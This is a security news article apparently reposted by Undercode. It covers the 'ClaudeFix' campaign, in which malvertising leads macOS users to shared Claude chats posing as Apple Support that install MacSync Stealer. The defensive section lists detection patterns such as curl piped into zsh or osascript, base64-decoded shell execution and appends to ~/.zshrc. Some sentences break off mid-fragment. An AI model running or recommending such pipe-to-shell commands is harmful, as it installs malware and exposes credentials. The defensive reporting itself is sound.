ClaudeFix: How Cybercriminals Turned Anthropic’s AI Platform Into a Dangerous Malware Delivery Channel for macOS Users + Video

Listen to this Post

Featured Image

Introduction

Artificial intelligence has rapidly become one of the most trusted technologies on the internet. Millions of users rely on AI assistants every day for coding, research, productivity, and technical support. Unfortunately, cybercriminals have noticed this growing trust and are now weaponizing AI platforms themselves as part of sophisticated social engineering campaigns.

Security researchers have uncovered a dangerous new campaign known as ClaudeFix, where attackers abuse Anthropic’s shared Claude conversations to distribute MacSync Stealer, a powerful information-stealing malware designed specifically for macOS. Instead of using traditional phishing pages or fake software installers, the attackers leveraged the credibility of Claude’s official platform to convince victims that they were following legitimate troubleshooting instructions.

The campaign represents a major evolution of the infamous ClickFix technique, demonstrating that modern cybercriminals are no longer just exploiting software vulnerabilities—they are exploiting human trust in artificial intelligence.

Attack Overview

Security researchers at Zscaler discovered a sophisticated campaign internally named ClaudeFix, which targets macOS users by abusing Anthropic’s Claude sharing functionality.

Unlike previous ClickFix attacks that relied on fake browser errors or CAPTCHA verification pages, this campaign sends victims directly to legitimate Claude shared conversations hosted on Anthropic’s official infrastructure.

Because the conversations appear on a trusted AI platform, many victims naturally assume the instructions are authentic.

This subtle shift dramatically increases the success rate of the attack while making traditional phishing detection significantly more difficult.

What is ClickFix?

ClickFix first emerged during 2024 as a new social engineering technique.

Instead of silently exploiting software vulnerabilities, ClickFix convinces victims to infect themselves.

The attacker displays fake troubleshooting instructions and asks users to copy and paste commands into:

Terminal

Windows Run dialog

macOS zsh shell

The victim unknowingly executes malicious commands that download and launch malware.

Since the user performs the action voluntarily, many security protections fail to recognize the activity as malicious.

ClaudeFix is simply the newest and perhaps most convincing evolution of this attack strategy.

How the ClaudeFix Campaign Works

The attack begins with malvertising.

Users searching Google for phrases such as:

Claude Download

Claude Mac

Claude Desktop

Claude Client

are presented with sponsored advertisements.

Rather than leading directly to malware, these advertisements redirect victims to a shared Claude conversation.

The conversation is labeled:

Shared by Apple Support

The attackers simply configured their Claude profile with this display name, making the conversation appear to originate from Apple’s technical support team.

The victim now believes they are receiving official recovery instructions hosted on Anthropic’s own platform.

The Fake Fix Instructions

Inside the Claude conversation, users are instructed to execute what appears to be a troubleshooting command.

The command is actually:

Base64 encoded

Downloads remote content using curl

Pipes everything directly into zsh

This is one of the biggest warning signs in cybersecurity.

The victim never sees the real script because everything is encoded before execution.

Within seconds, malware installation begins.

Multi-Stage Malware Execution

The attackers designed a highly modular infection chain consisting of several stages.

Stage One

The first command downloads a lightweight loader from attacker-controlled infrastructure.

Its only purpose is to retrieve additional payloads.

Stage Two

The downloaded script:

Decodes hidden payloads

Decompresses encrypted content

Executes everything through eval

Suppresses terminal output

Downloads another payload

The malware intentionally avoids displaying anything suspicious to the victim.

Everything appears normal.

Stage Three

The second-stage loader retrieves an AppleScript payload.

Instead of saving the file to disk, it immediately pipes the script into:

osascript

This technique reduces forensic evidence and bypasses many traditional antivirus detections.

Stealthy Data Exfiltration

Once sensitive information has been collected, the malware compresses everything into:

/tmp/osalogging.zip

Rather than uploading one large archive, the malware:

Splits the archive into 10MB pieces

Uploads each chunk separately

Retries failed uploads up to eight times

Deletes every local trace afterward

This significantly improves reliability while making detection more difficult.

What MacSync Stealer Steals

After execution, MacSync Stealer begins harvesting nearly every valuable piece of information stored on the system.

Its targets include:

Apple Keychain

Browser passwords

Browser cookies

Firefox credentials

Chromium credentials

Password manager extensions

SSH keys

AWS credentials

Kubernetes configuration files

Telegram application data

PDF documents

Apple Keynote presentations

Wallet files

KeePass databases

Sensitive office documents

The malware searches specifically for valuable file extensions that commonly contain confidential information.

Cryptocurrency Users Are Primary Targets

One particularly dangerous capability is its focus on cryptocurrency assets.

The malware actively searches for:

Browser wallet extensions

Desktop wallet applications

Ledger software

Trezor software

If Ledger Live or Trezor software is detected, the malware attempts to download replacement installers that researchers believe are trojanized versions capable of stealing recovery phrases and private keys.

This dramatically increases the financial impact of the compromise.

Persistence Mechanism

If the malware cannot immediately obtain sufficient privileges, it modifies:

~/.zshrc

This ensures malicious commands automatically execute whenever the victim opens a new Terminal session.

The malware also attempts to convince users to grant Full Disk Access, allowing it to bypass macOS privacy protections and harvest significantly more information.

Campaign Infrastructure

According to Zscaler telemetry, the campaign operated between:

June 12 and June 19, 2026

Researchers observed:

22 unique Google Ads campaign IDs

Seven different search keyword variations

English and Chinese search terms

Multiple attacker-controlled infrastructure servers

The malicious domains mimicked ordinary American local businesses such as flooring companies and PC repair services.

This naming strategy likely helped the domains avoid suspicion during automated reputation checks.

Evidence Suggesting Russian Developers

Researchers identified Russian-language comments embedded inside the AppleScript payload.

One comment referenced a fragile database copying function used when Firefox remained open.

Although code comments alone cannot definitively attribute attacks, they strongly suggest that the malware developers are Russian-speaking.

As always, attribution should be treated cautiously until supported by additional intelligence.

Why This Campaign Matters

ClaudeFix demonstrates a significant shift in cybercriminal strategy.

Instead of impersonating banks, Microsoft, or Apple websites, attackers are now abusing legitimate AI platforms that millions of users inherently trust.

The success of this campaign highlights a growing cybersecurity challenge:

People increasingly believe information simply because it appears inside a trusted AI service.

As AI platforms become more integrated into everyday workflows, they will inevitably become high-value targets for phishing, malware delivery, credential theft, and social engineering campaigns.

Trust is becoming the newest attack surface.

Deep Analysis

ClaudeFix is technically interesting because it combines multiple modern attack techniques into a single seamless infection chain.

Instead of relying on software exploits, the attackers weaponize human psychology through AI-generated credibility. Hosting malicious instructions on a legitimate Claude shared chat removes many of the visual indicators users associate with phishing. This approach also complicates detection because network traffic initially reaches a trusted domain before redirecting to attacker-controlled infrastructure.

The

Security teams should monitor unusual command execution chains on macOS, especially when curl downloads content that is immediately piped into a shell interpreter or when AppleScript executes network-delivered payloads. Endpoint Detection and Response (EDR) platforms should generate alerts for suspicious combinations such as:

Dangerous pattern commonly abused by ClickFix campaigns
curl -fsSL https://example[.]com/script | zsh

Base64 decoding followed by execution

echo "<base64>" | base64 -d | zsh

AppleScript execution from downloaded content

curl https://example[.]com/payload | osascript

Suspicious persistence modification

echo 'malicious_command' >> ~/.zshrc

Monitor recent shell history

history

Review persistence artifacts

cat ~/.zshrc

Check recent AppleScript activity

log show –predicate ‘process == “osascript”‘ –last 24h

Inspect temporary archive creation

ls -lah /tmp

Review network connections

lsof -i

Monitor active processes

ps aux | grep osascript

Search for unexpected launch agents

find ~/Library/LaunchAgents -type f

Verify installed applications

system_profiler SPApplicationsDataType

Organizations should also deploy application control policies, restrict unnecessary Terminal usage where practical, educate users never to execute “copy-and-paste” commands from chat platforms without independent verification, and continuously monitor outbound connections to newly registered or suspicious domains.

What Undercode Say:

The ClaudeFix campaign represents one of the clearest examples of how cybercriminals are adapting alongside artificial intelligence rather than fighting against it. AI platforms have become trusted environments where users naturally lower their guard, making them ideal vehicles for sophisticated social engineering.

This attack is notable because there was no software vulnerability in Claude itself. Instead, the attackers exploited the platform’s reputation. That distinction is critical. As AI assistants become embedded in enterprise workflows, attackers will increasingly focus on abusing legitimate features instead of searching for technical exploits.

Another important observation is the evolution of ClickFix. The technique has progressed from fake browser warnings to convincing AI-hosted conversations. Future iterations may include AI-generated troubleshooting sessions, interactive support chats, or personalized instructions that dynamically adapt to each victim’s responses.

The

MacSync

The campaign further demonstrates that paid advertising remains an effective malware distribution channel. Users often assume sponsored search results are verified, but malicious advertisers continue to abuse advertising ecosystems before detection and removal.

From a defensive perspective, organizations should expand security awareness training beyond phishing emails. Employees must understand that commands found in AI chats, forums, documentation, or messaging platforms should never be executed blindly, regardless of the platform hosting them.

Behavior-based detection will become increasingly important. Monitoring shell execution patterns, unusual AppleScript activity, unexpected modifications to shell configuration files, and abnormal outbound traffic can detect threats that signature-based solutions may miss.

The use of localized search terms, including Chinese-language keywords, suggests the operators were targeting a broad international audience rather than focusing on a single geographic region. This demonstrates careful planning and an understanding of global AI adoption trends.

The inclusion of Russian-language comments inside the code may provide investigative leads, but attribution should remain cautious. Malware developers frequently reuse code, collaborate across borders, or intentionally include misleading artifacts to complicate investigations.

Looking ahead, AI service providers will likely introduce stronger content moderation, abuse detection, and automated scanning for malicious command sequences shared through public conversations. However, attackers are expected to continue experimenting with new methods to bypass these safeguards.

Ultimately, ClaudeFix is a reminder that the most dangerous attacks often exploit trust rather than technology. As AI becomes a routine part of daily computing, verifying instructions before execution will be as important as patching software vulnerabilities.

✅ Confirmed: Zscaler publicly documented the ClaudeFix campaign, identifying the abuse of shared Claude chats to distribute the MacSync Stealer malware and confirming that the malicious shared conversations were reported and removed.

✅ Confirmed: The campaign relied on Google malvertising, multi-stage shell execution, AppleScript delivery, and targeted theft of credentials, sensitive documents, cloud keys, and cryptocurrency wallet data on macOS systems.

❌ Not Fully Confirmed: While Russian-language comments were discovered in the malware source code, they do not conclusively prove the attackers are based in Russia. Such artifacts can be intentionally misleading or inherited from reused code, so attribution requires additional intelligence beyond code comments alone.

Prediction

(+1) AI platform providers will significantly strengthen abuse detection, automatically identifying and blocking conversations that encourage users to execute encoded shell commands or download suspicious payloads.

(-1) Cybercriminals will increasingly migrate from traditional phishing websites to trusted AI platforms, collaborative workspaces, and developer communities, making social engineering attacks substantially more convincing and difficult for both users and security products to detect.

(-1) Information-stealing malware targeting macOS will continue to grow in sophistication, with future variants likely incorporating AI-generated instructions, adaptive payloads, and improved evasion techniques to target developers, cryptocurrency investors, and enterprise users.

▶️ Related Video (76% Match):

🕵️‍📝Let’s dive deep and fact‑check.

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

References:

Reported By: cyberpress.org
Extra Source Hub (Possible Sources for article):
https://stackoverflow.com
Wikipedia
OpenAi & Undercode AI

Image Source:

Unsplash
Undercode AI DI v2

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeNews & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon | 📺Youtube